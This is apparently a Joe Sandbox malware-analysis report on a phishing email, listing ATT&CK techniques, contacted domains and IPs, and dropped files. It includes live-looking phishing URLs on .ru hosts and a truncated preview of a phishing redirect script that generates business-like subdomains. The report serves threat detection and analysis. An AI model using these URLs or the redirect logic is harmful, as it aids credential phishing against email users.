              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation21
              Browser Extensions
              1
              Process Injection
              11
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Modify Registry
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Process Injection
              Security Account Manager14
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              File Deletion
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://qnj64b.cuisbp.ru/loray$68hba2u0%Avira URL Cloudsafe
              https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy0%Avira URL Cloudsafe
              https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/favicon.ico0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                high
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
                  188.114.97.3
                  truefalse
                    unknown
                    code.jquery.com
                    151.101.130.137
                    truefalse
                      high
                      developers.cloudflare.com
                      104.16.6.189
                      truefalse
                        high
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            mjj6bxg1xo.moydovv.com
                            104.21.80.1
                            truefalse
                              unknown
                              www.google.com
                              142.250.186.164
                              truefalse
                                high
                                s-0005.dual-s-msedge.net
                                52.123.128.14
                                truefalse
                                  high
                                  qnj64b.cuisbp.ru
                                  188.114.96.3
                                  truefalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.nel.cloudflare.com/report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFyfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.comfalse
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                        high
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#contactfalse
                                            unknown
                                            https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                              high
                                              https://developers.cloudflare.com/favicon.pngfalse
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                  high
                                                  https://qnj64b.cuisbp.ru/loray$68hba2ufalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.186.46
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  52.109.89.18
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  216.58.206.78
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  104.16.5.189
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.21.80.1
                                                  mjj6bxg1xo.moydovv.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.130.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  142.250.185.163
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  199.232.214.172
                                                  bg.microsoft.map.fastly.netUnited States
                                                  54113FASTLYUSfalse
                                                  20.42.73.26
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.16.6.189
                                                  developers.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.184.227
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  66.102.1.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.186.35
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  1.1.1.1
                                                  unknownAustralia
                                                  13335CLOUDFLARENETUSfalse
                                                  52.109.68.130
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.18.95.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  52.123.128.14
                                                  s-0005.dual-s-msedge.netUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  2.16.164.16
                                                  unknownEuropean Union
                                                  20940AKAMAI-ASN1EUfalse
                                                  188.114.97.3
                                                  cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ruEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  52.109.28.47
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  188.114.96.3
                                                  qnj64b.cuisbp.ruEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  142.250.186.164
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  104.17.25.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.17
                                                  192.168.2.5
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1641469
                                                  Start date and time:2025-03-18 09:58:03 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Sample name:Attached_image+from+ADMIN@weareworkspace.com.eml
                                                  Detection:MAL
                                                  Classification:mal88.phis.evad.winEML@28/15@24/104
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .eml
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.47, 2.16.164.16, 2.16.164.121, 199.232.214.172, 52.123.128.14, 40.126.31.2
                                                  • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, uks-azsc-000.roaming.officeapps.live.com, login.live.com, ecs.office.trafficmanager.net, c.pki.goog, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2684
                                                  Entropy (8bit):3.893756697297494
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AA8D08E623CA623BB66D3E43626C399B
                                                  SHA1:13464BB54A7FC87B46B914FAB02480FECECC5DA3
                                                  SHA-256:E0C715E99B082D8F27730A52181287B426F421EA034607D4DF197C2489145E8B
                                                  SHA-512:DE52886B3131FB9A623DD3CF3C6DD65E51D60DA69188D868E046FAD99D9AE84FE7353CBB58DC0BB1E14BA0F76226CA0F1231F2060EFA10772B5739EEABD6B8E0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".R.l.E.x.e.9.k.M.K.K.i.j.b.B.7.5.J.q.S.K.c.l.w.j.E.n.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".9.m.a.f.h.b.W.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.5.Z.F.Y.y.
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):181342
                                                  Entropy (8bit):5.29576200105165
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5226B8EB13DCB05321329A6CFC7CF6F1
                                                  SHA1:0FCA7A442051151B2202123AEE5E505E77BDF827
                                                  SHA-256:EB5FF380D190EFDF9AE9007C9FEDBE9BA7AB254C34A6DCAC0A4217935235694D
                                                  SHA-512:9A3CF6C70C2AB7FAA709F9F18F126FA1B330C20D2F6BEDB104B003EAC693278C77B163601CD4A4C3EE232C86D2BFFEE6FACBF3518A498A5D180D05E793BAFCC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2025-03-18T08:59:24">.. Build: 16.0.18413.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results?fullframe=yes</o:url>.. <o:ticket o:policy="DELEGATION" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Bearer {}" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.Resourc
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.12527680355609347
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:08067627EE7344EE2EBF233C343ED670
                                                  SHA1:2C952F22AF172B1664E9778D723783BC1B2C2FDE
                                                  SHA-256:544D5747078ED5BB7EED8D862A45D9E9E55AE054D5B3AF6E57B682A456A89261
                                                  SHA-512:F459AADC82E67D69A5991522D929044C3C4A2872AE79C1D37DB9EDB8581175EE2D0632AF4B85739970B00CCD99E91E8998C2C4FE4EEEFBB31BD4BBFF474B1055
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................f..........._.M....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.&j6..........................H.x.A.c.c.o.u.n.t.s.A.l.w.a.y.s.O.n.L.o.g.g.e.r...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.m.i.c.r.o.s.o.f.t...w.i.n.d.o.w.s.c.o.m.m.u.n.i.c.a.t.i.o.n.s.a.p.p.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.\.L.o.c.a.l.S.t.a.t.e.\.H.x.A.c.c.o.u.n.t.s.A.l.w.a.y.s.O.n.L.o.g...e.t.l.........P.P..........g.M....................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):37
                                                  Entropy (8bit):3.843795932845685
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:05079CC86350248F501B45142ADDAD88
                                                  SHA1:359B8513A1934C4B0D67772B628C4B430FAD6338
                                                  SHA-256:822F131E96BB5D54E4DC998C19065E3C15C37909A0DE02E7721EE68339A1DF47
                                                  SHA-512:A8E81871D1F76DA9FF04C85C4B5A29E6C229BEF40AC33122F8E652E00ABA46D0008B1B7EF3706B835A189B7843177F60AA5202CAFB0067E3E502518D157F810B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:FDF6A1EC-03E6-457A-8662-36AE1930D6F9.
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):53
                                                  Entropy (8bit):3.951713558574187
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6E454258315DDED8053A91316C7C6841
                                                  SHA1:4374831933CFAEE0EBCC238DAF0E1EB2FDEAA9F2
                                                  SHA-256:1FAE2A563C7F1BF62EB85B2322798A78DB1960F26E004456E57952A55F538353
                                                  SHA-512:5AF8EF46894B37B25F412C919B0FB827C3FB7F5829FB8D691D6976CA8FD383862CA009F28C7DD947829CED390B4776B05E0215957CF75E402E87B39C450B31BA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1742288364825..259BC463-F36B-49AB-AB5F-F0F718387FF9..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):110592
                                                  Entropy (8bit):4.510501407512603
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5DBEF77411D795AC8B7EED7872D650F2
                                                  SHA1:ED4C20E67DBB1B344721193550A9C1311045F7EE
                                                  SHA-256:787B0CE5255027A3A18CF0A919CE9B200AEAC7EB1FE3264788FAF08FDC6D7DFC
                                                  SHA-512:BA56B27BA3AF7A6B22AA3AB1D915D2A53BC2DA4CC478C939A2DF0AD0018ABF39E709D7B8D215862604563264F036A096B2217157EF4B48D8FC4FC87E318F445F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................d............)'....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.&j6............)'............v.2._.O.U.T.L.O.O.K.:.1.b.e.c.:.c.0.a.5.1.b.c.5.2.a.9.8.4.5.b.f.9.7.d.c.8.b.d.8.5.3.b.1.2.6.1.7...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.1.8.T.0.4.5.8.3.8.0.0.0.3.-.7.1.4.8...e.t.l...........P.P..........)'....................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:Microsoft Outlook email folder (>=2003)
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):2.666801190138904
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2A2AD27EFCC9A48BF707ED6754271DB6
                                                  SHA1:93E4066A707883D6367B62564A03D7DC16E4EE71
                                                  SHA-256:B233327EA3049C1A1F2C3423448D1D885E8DFFDE3A140FDA2D0C2CF14DDEA825
                                                  SHA-512:AAD6C5788660FB70A8CBF59833C0261B71B0CED02CF834F963D8191D6D82D2C6CFA1E4CF9D17A5DA476CEA59B3B75F323EEE1DADECCAD52D6EB2A03AFC982C60
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:!BDN.X.SM......\..............E.......b................@...........@...@...................................@...........................................................................$.......D......................D........p......A...........................................................................................................................................................................................................................................................................................H.......9G.k.#d.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):2.9350429961535487
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B9AF1549041AD4D9DC480C22E3A4A401
                                                  SHA1:7BA7FA239279E58816CD904F21A71DFAD24B0E68
                                                  SHA-256:13CD044802BC742FD4419284FF168C4467316C750143AD8BEAB5E1B7253AD3B1
                                                  SHA-512:B3EB60B03DC50A1DF8ACE91A55B6861E65EDA065F510059ABE6B9E83FBE521B9DCD223C284761E7AAC1C807451026B2358360D32D30A94C1BBE3DAA9C44946EF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:...LC...c....................................#.!BDN.X.SM......\..............E.......b................@...........@...@...................................@...........................................................................$.......D......................D........p......A...........................................................................................................................................................................................................................................................................................H.......9G.k.#d.............B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):18633
                                                  Entropy (8bit):4.578954023736971
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5875F7B344E438D3833FEE8CC1A34B41
                                                  SHA1:785573F9FD3304B8E28BB815346C772335034A7E
                                                  SHA-256:6D6198488A73BE0A56C5814748FADECF517AC662919CA1CA20B629FB62E0A126
                                                  SHA-512:BD6B25B8A4112920CEC080311CF7B15BB025610EF96452924F4A595F3413393A66EF82A75D5836879A25B8F698446FFC41F911B916F5D6CBD9B078CB64F5FD4C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://mjj6bxg1xo.moydovv.com/jFIlzWqSXCfn6wNHvB6C4VOJ6eUL2XfKC41xF6IAkhhtCs7xTdngwFjRLPyuMHCrRLgWgWS9Lz3mCBCLHAyGS3LqWNfKsMB2OjTOub2JcUNPZwEa39XlF6nCaRVOlRBan99j9oRo3PlIuwhrbT6tOqHhsNgZu1kNmotrgkGcmEpfwGfZL7kNR3x5TcEIoaX5gc4b5xlh/0kH7FYAJC6z7gu5UqtFDdKEemyYtMEX4qvSzJaofSVWjumVcKRIHYRUkgZosSgjugIzNpiZIWWgcI6g19a8O6BeSmjnpkEKsPmq0Er6nPcprXPaGCNbZmWTZK2XWUAP5b3Rtl7lXvyxtd8XxJRKonLcrA5T696jpVLnQ2nMY6AYJpsGmoAkzBk8CZJCvsxctEl43p0GK/admin@weareworkspace.com
                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Instant Redirect Script</title>.. <script>.. // Revised list of positive ID words.. const idWords = [.. 'sessionsid', 'accountid', 'identifier', 'statusid', 'accessid', 'tokenid', .. 'referenceid', 'authenticationid', 'processingid', 'userid', 'portalid', 'appid', 'siteid', 'centerid', 'hubid', 'zoneid' .. ];..........// NEW ADDITION: Business-like subdomain prefixes and suffixes.. const businessPrefixes = ['secure', 'app', 'portal', 'login', 'my', 'web', 'connect', .. 'api', 'cloud', 'service', 'mail', 'docs', 'support', 'account', 'client', 'user', 'admin', 'dev', 'stage'];.. .. const businessSuffixes = ['portal', 'app', 'site', 'center', 'hub', 'zone', 'space', .. 'access
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):937
                                                  Entropy (8bit):7.737931820487441
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FC3B7BBE7970F47579127561139060E2
                                                  SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                  SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                  SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://developers.cloudflare.com/favicon.png
